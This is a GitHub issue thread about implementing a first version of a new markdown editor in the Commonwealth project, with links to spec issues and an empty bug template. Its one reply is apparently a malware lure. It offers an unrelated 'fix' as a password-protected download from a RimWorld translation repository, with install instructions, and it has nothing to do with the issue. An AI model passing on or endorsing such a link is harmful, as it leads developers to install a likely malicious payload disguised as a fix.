### ISSUE TITLE
Implement v0 of the new markdown editor

### ISSUE THREAD

**Issue by burtonator** [hicommonwealth/commonwealth#9039]
## Describe the bug

This is designed to:

- get initial feedback from the team on the UI behavior
- identify any unknown UI issues
- get the code merged ASAP so I don't drop a massive PR on the team.

Note that this is the editor spec issue:

https://github.com/hicommonwealth/commonwealth/issues/8593

And this is what I implemented for v0:

https://github.com/hicommonwealth/commonwealth/issues/8937

### Initial conditions

**Environment:** 

**Branch/Release version:** 

**Browser:** 

**Wallet:**

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
